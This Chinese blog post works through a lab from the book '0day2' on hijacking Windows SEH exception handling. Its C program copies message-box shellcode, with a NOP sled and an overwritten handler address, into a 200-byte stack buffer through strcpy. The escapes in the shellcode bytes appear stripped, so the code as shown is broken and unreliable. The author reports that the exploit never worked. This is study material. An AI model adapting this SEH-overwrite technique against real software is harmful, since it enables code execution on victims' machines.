• 旧书重温:0day2【8】狙击windows的异常处理实验

    现在进入0day2的第六章内容

    其中第六章的书本内容我都拍成了图片格式放在了QQ空间中(博客园一张一传,太慢了)http://user.qzone.qq.com/252738331/photo/V10U5YUk464GF5/   密码NQK3S

    废话不说了,代码

     1 // 0day2_8.cpp : Defines the entry point for the console application.
 2 //
 3 
 4 #include "stdafx.h"
 5 #include <windows.h>
 6 #include <stdio.h>
 7 //    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
 8 char shellcode[] ={
 9                 
10             
11                 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xccxccxccxcc"
12                 "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7Ex0Cx33"
13                 "xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30"
14                 "x8Bx4Bx0Cx8Bx49x1Cx57x56x8Bx69x08x8Bx79x20x8Bx09x66x39x57x18x75xF2"
15                 "x5Ex5FxADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05"
16                 "x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4"
17                 "x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66"
18                 "x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75"
19                 "xA9x33xDBx53x68x61x61x61x61x68x62x62x62x62x8BxC4x53x50x50x53xFFx57"
20                 "xFCx53xFFx57xF8"
21                 
22                 "x90x90x90x90x90x90x90x90x90x9cxfex12x00"
23 
24 
25                 };
26 DWORD MyExceptionHandler(void)
27 {
28     printf("got an exception,press enter to kill process!
");
29     getchar();
30     ExitProcess(1);
31     return 0;
32 }
33 void Test(char * input)
34 {
35     char buf[200];
36     int zero = 0;
37     //__asm int 3
38     //printf("len %d 
",strlen(shellcode));
39     //_asm int 3
40     __try
41     {
42         strcpy(buf,input);
43     
44         zero=4/zero;
45     }
46     __except(MyExceptionHandler()){}
47 }
48 int main(int argc, char* argv[])
49 {
50     /*_asm{
51 
52     lea eax,dword ptr shellcode
53     call eax
54     }*/
55     Test(shellcode);
56     return 0;
57 }

    这个实验 做了好久,弄了也好久,最后:我们可爱的msg就是弹不出来,打击了我的积极性,所以搁置了好久!

    ----------------------------------------------------

    | QQ252738331

    | Q群: 104132152(群名称是缓冲区溢出|汇编|逆向)

    | 微博: http://t.qq.com/zhenw0

    ----------------------------------------------------
  • 相关阅读:
    RabbitMQ 内存控制 硬盘控制
    Flannel和Docker网络不通定位问题
    kafka集群扩容后的topic分区迁移
    CLOSE_WAIT状态的原因与解决方法
    搭建Harbor企业级docker仓库
    Redis哨兵模式主从持久化问题解决
    mysql杂谈(爬坑,解惑,总结....)
    Linux的信号量(semaphore)与互斥(mutex)
    SIP协议的传输层原理&报文解析(解读rfc3581)(待排版) && opensips
    SIP协议的传输层原理&报文解析(解读RFC3261)(待排版)&&启动
  • 原文地址:https://www.cnblogs.com/witty/p/0day2_8.html
Copyright © 2020-2023  润新知